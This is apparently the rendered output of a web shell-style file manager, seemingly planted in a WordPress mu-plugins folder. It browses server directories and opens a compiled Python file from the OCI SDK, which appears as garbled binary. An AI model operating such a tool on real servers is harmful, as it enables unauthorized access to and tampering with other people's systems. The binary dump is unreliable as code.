📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
identity_data_plane
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/identity_data_plane/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: context_variable.cpython-39.opt-1.pyc
a ���fM � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdZdd� Z e d d � �Zejdd � �Ze dd � �Z e jdd � �Z e dd� �Zejdd� �Zdd� Zdd� Zdd� ZdS )�ContextVariablez ContextVariable model. �STRING�NUMBER�ENTITY�BOOLEAN�LISTc K s2 dddd�| _ dddd�| _d| _d| _d| _dS )a� Initializes a new ContextVariable object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param name: The value to assign to the name property of this ContextVariable. :type name: str :param value: The value to assign to the value property of this ContextVariable. :type value: str :param type: The value to assign to the type property of this ContextVariable. Allowed values for this property are: "STRING", "NUMBER", "ENTITY", "BOOLEAN", "LIST" :type type: str �str)�name�value�typer r r N)Z swagger_typesZ attribute_map�_name�_value�_type)�self�kwargs� r �S/usr/lib/python3.9/site-packages/oci/identity_data_plane/models/context_variable.py�__init__&